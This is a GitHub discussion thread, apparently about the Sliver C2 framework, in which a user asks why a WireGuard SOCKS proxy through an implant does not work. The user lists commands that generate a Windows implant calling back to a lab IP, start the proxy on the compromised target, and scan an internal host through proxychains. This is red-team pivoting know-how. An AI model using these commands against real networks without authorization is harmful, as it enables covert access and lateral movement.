Reverse WireGuard SOCKS Proxy #709
Unanswered
Thomas-McKanna
asked this question in
Q&A
Replies: 2 comments 2 replies
-
This looks correct to me @rkervella thoughts? |
Beta Was this translation helpful? Give feedback.
0 replies
-
I think you need to start the |
Beta Was this translation helpful? Give feedback.
2 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
-
For the life of me, I have not been able to figure out how to get the wg-socks proxy to work.
Steps taken:
Generate an implant in Sliver with
generate --wg 192.168.119.189 --os windows --arch 386 --save /tmp
Generate a configuration in Sliver with
wg-config --save /home/kali/Desktop/wg.conf
Change config so that it looks like:
Run
wg-quick up /home/kali/wg.conf
Start listener in Sliver with
wg
Open a session in Sliver by running implant binary on target
Use the session and run
wg-socks start
with response[*] Started SOCKS server on 100.64.0.27:3090
At this point, I believe I have followed the wiki article exactly.
Now how do I use this thing?
I have my proxychains configuration file set to:
Running
proxychains namp -sT 172.16.189.5
, which is an IP that should be reachable from my implanted target, times out.I was able to get the socks proxy to work with the
socks5
command, but would like to be able to usewg-socks
since it is more stable.Beta Was this translation helpful? Give feedback.
All reactions